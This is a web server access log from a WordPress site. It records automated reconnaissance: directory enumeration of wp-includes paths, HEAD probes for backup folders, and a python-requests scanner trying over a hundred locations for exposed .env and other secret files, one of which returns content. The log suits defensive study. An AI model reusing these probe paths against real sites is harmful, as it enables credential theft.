45.149.173.201 - - [27/Aug/2025:06:10:08 +0800] "GET /wp-admin/maint/ HTTP/1.1" 403 146 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"
45.149.173.201 - - [27/Aug/2025:06:10:09 +0800] "GET /docs/ HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
45.149.173.201 - - [27/Aug/2025:06:10:10 +0800] "GET /wp-includes/random_compat/ HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36"
45.149.173.201 - - [27/Aug/2025:06:10:11 +0800] "GET /wp-includes/js/tinymce/utils/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36"
45.149.173.201 - - [27/Aug/2025:06:10:12 +0800] "GET /backup/ HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
45.149.173.201 - - [27/Aug/2025:06:10:13 +0800] "GET /wp-includes/blocks/freeform/ HTTP/1.1" 403 146 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0"
45.149.173.201 - - [27/Aug/2025:06:10:13 +0800] "GET /wp-includes/js/jcrop/ HTTP/1.1" 403 146 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0"
45.149.173.201 - - [27/Aug/2025:06:10:13 +0800] "GET /wp-includes/js/dist/development/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36"
45.149.173.201 - - [27/Aug/2025:06:10:14 +0800] "GET /components/ HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
45.149.173.201 - - [27/Aug/2025:06:10:15 +0800] "GET /wp-includes/js/dist/ HTTP/1.1" 403 146 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.149.173.201 - - [27/Aug/2025:06:10:16 +0800] "GET /aspera/faspex/ HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
45.149.173.201 - - [27/Aug/2025:06:10:17 +0800] "GET /wp-includes/css/dist/edit-widgets/ HTTP/1.1" 403 146 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0"
45.149.173.201 - - [27/Aug/2025:06:10:17 +0800] "GET /wp-includes/blocks/group/ HTTP/1.1" 403 146 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0"
45.149.173.201 - - [27/Aug/2025:06:10:18 +0800] "GET /wp-content/uploads/2022/ HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0"
45.149.173.201 - - [27/Aug/2025:06:10:19 +0800] "GET /wp-includes/Requests/src/ HTTP/1.1" 403 146 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0"
45.149.173.201 - - [27/Aug/2025:06:10:19 +0800] "GET /wp-content/themes/ HTTP/1.1" 200 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0"
45.149.173.201 - - [27/Aug/2025:06:10:19 +0800] "GET /wp-content HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
45.149.173.201 - - [27/Aug/2025:06:10:20 +0800] "GET /wp-includes/sodium_compat/namespaced/Core/ HTTP/1.1" 403 146 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0"
45.149.173.201 - - [27/Aug/2025:06:10:21 +0800] "GET /wp-includes/Requests/Auth/ HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0"
45.149.173.201 - - [27/Aug/2025:06:10:21 +0800] "GET /wp-includes/blocks/latest-comments/ HTTP/1.1" 403 146 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0"
45.149.173.201 - - [27/Aug/2025:06:10:22 +0800] "GET /wp-content/plugins/xt/ HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36"
45.149.173.201 - - [27/Aug/2025:06:10:23 +0800] "GET /wp-content/fonts/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36"
45.149.173.201 - - [27/Aug/2025:06:10:24 +0800] "GET /wp-includes/Requests/Transport/ HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36"
45.149.173.201 - - [27/Aug/2025:06:10:25 +0800] "GET /wp-content/uploads/2022/07/ HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
45.149.173.201 - - [27/Aug/2025:06:10:26 +0800] "GET /.tmb/ HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36"
45.149.173.201 - - [27/Aug/2025:06:10:27 +0800] "GET /wp-includes/css/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
36.133.115.36 - - [27/Aug/2025:06:11:02 +0800] "POST /wp-cron.php?doing_wp_cron=1756246262.3570239543914794921875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [27/Aug/2025:06:11:02 +0800] "GET / HTTP/1.1" 200 33395 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [27/Aug/2025:06:16:00 +0800] "POST /wp-cron.php?doing_wp_cron=1756246560.0140230655670166015625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.166.1.243 - - [27/Aug/2025:06:16:00 +0800] "GET / HTTP/1.1" 200 33395 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [27/Aug/2025:06:23:52 +0800] "POST /wp-cron.php?doing_wp_cron=1756247032.3874819278717041015625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.94.31.74 - - [27/Aug/2025:06:23:52 +0800] "POST / HTTP/1.1" 200 33395 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:23:54 +0800] "GET /.env HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:23:55 +0800] "GET /API/.env HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:23:56 +0800] "GET /.env.example HTTP/1.1" 404 8988 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:23:57 +0800] "GET /api/.env HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:23:58 +0800] "GET /server/.env HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:23:59 +0800] "GET /blog HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:24:01 +0800] "GET /.blog HTTP/1.1" 404 8988 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:24:02 +0800] "GET /_profiler/phpinfo HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:24:03 +0800] "GET /.env.save HTTP/1.1" 404 8988 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:24:04 +0800] "GET /laravel/.env HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:24:05 +0800] "GET /test/.env HTTP/1.1" 404 8988 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:24:07 +0800] "GET /admin/.env HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:24:08 +0800] "GET /vendor/.env HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:24:09 +0800] "GET /sites/.env HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:24:10 +0800] "GET /blog/.env HTTP/1.1" 404 8988 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:24:11 +0800] "GET /system/.env HTTP/1.1" 404 8988 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:24:12 +0800] "GET /public/.env HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:24:14 +0800] "GET /shop/.env HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:24:15 +0800] "GET /dev/.env HTTP/1.1" 404 8988 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:24:16 +0800] "GET /.env.local HTTP/1.1" 404 8988 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:24:17 +0800] "GET /core/.env HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:24:18 +0800] "GET /.env.backup HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:24:20 +0800] "GET /app/.env HTTP/1.1" 404 8988 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:24:21 +0800] "GET /.env.production HTTP/1.1" 404 8988 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:24:22 +0800] "GET /.env.development HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:24:23 +0800] "GET /.env.staging HTTP/1.1" 404 8988 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:24:24 +0800] "GET /.env.testing HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:24:25 +0800] "GET /.env.template HTTP/1.1" 404 8988 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:24:27 +0800] "GET /.env.sample HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:24:28 +0800] "GET /.env.dist HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:24:29 +0800] "GET /.env.bak HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:24:30 +0800] "GET /.env.tmp HTTP/1.1" 404 8988 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:24:31 +0800] "GET /.env.old HTTP/1.1" 404 8988 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:24:33 +0800] "GET /.env.original HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:24:34 +0800] "GET /.env.lock HTTP/1.1" 404 8990 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:24:35 +0800] "GET /.env~ HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:24:36 +0800] "GET /.env.swp HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:24:37 +0800] "GET /.env.swo HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:24:38 +0800] "GET /config/.env HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:24:40 +0800] "GET /config/.env.local HTTP/1.1" 404 8988 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:24:41 +0800] "GET /config/.env.production HTTP/1.1" 404 8988 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:24:42 +0800] "GET /config/.env.development HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:24:43 +0800] "GET /config/.env.staging HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:24:44 +0800] "GET /config/.env.testing HTTP/1.1" 404 8990 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:24:45 +0800] "GET /config/.env.example HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
36.133.115.36 - - [27/Aug/2025:06:24:47 +0800] "POST /wp-cron.php?doing_wp_cron=1756247086.9640800952911376953125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.94.31.74 - - [27/Aug/2025:06:24:47 +0800] "GET /config/.env.bak HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:24:48 +0800] "GET /config/.env.old HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:24:49 +0800] "GET /config/.env.template HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:24:50 +0800] "GET /config/.env.sample HTTP/1.1" 404 8988 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:24:51 +0800] "GET /config/.env.tmp HTTP/1.1" 404 8988 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:24:53 +0800] "GET /config/.env.save HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:24:54 +0800] "GET /src/.env HTTP/1.1" 404 8990 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:24:55 +0800] "GET /src/config/.env HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:24:56 +0800] "GET /src/env/.env HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:24:57 +0800] "GET /app/config/.env HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:24:58 +0800] "GET /project/.env HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:24:59 +0800] "GET /application/.env HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:25:01 +0800] "GET /server/config/.env HTTP/1.1" 404 8988 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:25:02 +0800] "GET /tmp/.env HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:25:03 +0800] "GET /tmp/config/.env HTTP/1.1" 404 8988 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:25:04 +0800] "GET /temp/.env HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:25:05 +0800] "GET /temp/env/.env HTTP/1.1" 404 8988 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:25:06 +0800] "GET /logs/.env HTTP/1.1" 404 8988 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:25:08 +0800] "GET /backup/.env HTTP/1.1" 404 8988 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:25:09 +0800] "GET /backups/.env HTTP/1.1" 404 8988 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:25:10 +0800] "GET /old/.env HTTP/1.1" 404 8987 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:25:11 +0800] "GET /previous/.env HTTP/1.1" 404 8988 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:25:12 +0800] "GET /cache/.env HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:25:13 +0800] "GET /var/www/.env HTTP/1.1" 404 8988 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:25:15 +0800] "GET /var/www/html/.env HTTP/1.1" 404 8988 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:25:16 +0800] "GET /public_html/.env HTTP/1.1" 404 8988 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:25:17 +0800] "GET /htdocs/.env HTTP/1.1" 404 8988 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:25:18 +0800] "GET /www/.env HTTP/1.1" 404 8988 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:25:19 +0800] "GET /laravel/.env.example HTTP/1.1" 404 8988 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:25:21 +0800] "GET /laravel/config/.env HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:25:22 +0800] "GET /laravel/storage/.env HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:25:23 +0800] "GET /django/.env HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:25:24 +0800] "GET /django/settings/.env HTTP/1.1" 404 8988 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:25:25 +0800] "GET /django/config/.env HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:25:26 +0800] "GET /node/.env HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:25:28 +0800] "GET /rails/.env HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:25:29 +0800] "GET /rails/config/.env HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:25:30 +0800] "GET /php/.env HTTP/1.1" 404 8988 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:25:31 +0800] "GET /www/config/.env HTTP/1.1" 404 8988 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:25:32 +0800] "GET /docker/.env HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:25:34 +0800] "GET /docker-compose/.env HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:25:35 +0800] "GET /docker-compose.override.yml HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:25:36 +0800] "GET /k8s/.env HTTP/1.1" 404 8988 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:25:37 +0800] "GET /k8s/secrets.env HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:25:38 +0800] "GET /terraform/.env HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:25:39 +0800] "GET /aws/.env HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:25:40 +0800] "GET /gcp/.env HTTP/1.1" 404 8988 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:25:42 +0800] "GET /azure/.env HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:25:43 +0800] "GET /helm/.env HTTP/1.1" 404 8988 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:25:44 +0800] "GET /.env.pipeline HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:25:45 +0800] "GET /ci/.env HTTP/1.1" 404 8988 "-" "python-requests/2.32.4"
36.133.115.36 - - [27/Aug/2025:06:25:46 +0800] "POST /wp-cron.php?doing_wp_cron=1756247146.8198339939117431640625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.94.31.74 - - [27/Aug/2025:06:25:46 +0800] "GET /ci/config/.env HTTP/1.1" 404 8988 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:25:48 +0800] "GET /github/workflows/.env HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:25:49 +0800] "GET /gitlab-ci/.env HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:25:50 +0800] "GET /etc/.env HTTP/1.1" 404 8988 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:25:51 +0800] "GET /etc/config/.env HTTP/1.1" 404 8988 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:25:52 +0800] "GET /etc/environment HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:25:53 +0800] "GET /etc/secrets/.env HTTP/1.1" 404 8988 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:25:55 +0800] "GET /usr/local/etc/.env HTTP/1.1" 404 8988 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:25:56 +0800] "GET /usr/local/etc/config/.env HTTP/1.1" 404 8988 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:25:57 +0800] "GET /hidden/.env HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:25:58 +0800] "GET /private/.env HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:25:59 +0800] "GET /secure/.env HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:26:00 +0800] "GET /secrets/.env HTTP/1.1" 404 8988 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:26:02 +0800] "GET /config/secrets/.env HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:26:03 +0800] "GET /credentials/.env HTTP/1.1" 404 8988 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:26:04 +0800] "GET /settings/.env HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:26:05 +0800] "GET /environment/.env HTTP/1.1" 404 8988 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:26:06 +0800] "GET /env/.env HTTP/1.1" 404 8988 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:26:08 +0800] "GET /.env.txt HTTP/1.1" 200 19264 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:26:09 +0800] "GET /.env.json HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:26:10 +0800] "GET /.env.yaml HTTP/1.1" 404 8988 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:26:11 +0800] "GET /.env.yml HTTP/1.1" 404 8988 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:26:13 +0800] "GET /.env.xml HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:26:14 +0800] "GET /.envfile HTTP/1.1" 404 8990 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:26:15 +0800] "GET /.env-vars HTTP/1.1" 404 8987 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:26:16 +0800] "GET /.app-env HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:26:17 +0800] "GET /.system-env HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:26:19 +0800] "GET /.prod-env HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:26:20 +0800] "GET /.dev-env HTTP/1.1" 404 8988 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:26:21 +0800] "GET /myplms/public HTTP/1.1" 404 8988 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:26:22 +0800] "GET /api/myplms/public HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:26:23 +0800] "GET /api/myplms/auth/login HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:26:24 +0800] "GET /api/myplms/users HTTP/1.1" 404 8990 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:26:26 +0800] "GET /api/myplms/courses HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:26:26 +0800] "GET /api/myplms/settings/info.php HTTP/1.1" 404 47 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:26:27 +0800] "GET /phpunit.xml HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
45.94.31.74 - - [27/Aug/2025:06:26:28 +0800] "GET /supervisor-example.conf HTTP/1.1" 404 8989 "-" "python-requests/2.32.4"
36.133.115.36 - - [27/Aug/2025:06:41:44 +0800] "POST /wp-cron.php?doing_wp_cron=1756248104.2672660350799560546875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
34.169.32.204 - - [27/Aug/2025:06:41:44 +0800] "HEAD /wordpress HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
34.169.32.204 - - [27/Aug/2025:06:41:44 +0800] "HEAD / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
34.169.32.204 - - [27/Aug/2025:06:41:45 +0800] "HEAD /wp HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
36.133.115.36 - - [27/Aug/2025:06:41:46 +0800] "POST /wp-cron.php?doing_wp_cron=1756248106.0737578868865966796875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
34.169.32.204 - - [27/Aug/2025:06:41:46 +0800] "HEAD /bc HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
34.169.32.204 - - [27/Aug/2025:06:41:46 +0800] "HEAD /bk HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
34.169.32.204 - - [27/Aug/2025:06:41:47 +0800] "HEAD /backup HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
34.169.32.204 - - [27/Aug/2025:06:41:48 +0800] "HEAD /old HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
34.169.32.204 - - [27/Aug/2025:06:41:49 +0800] "HEAD /new HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
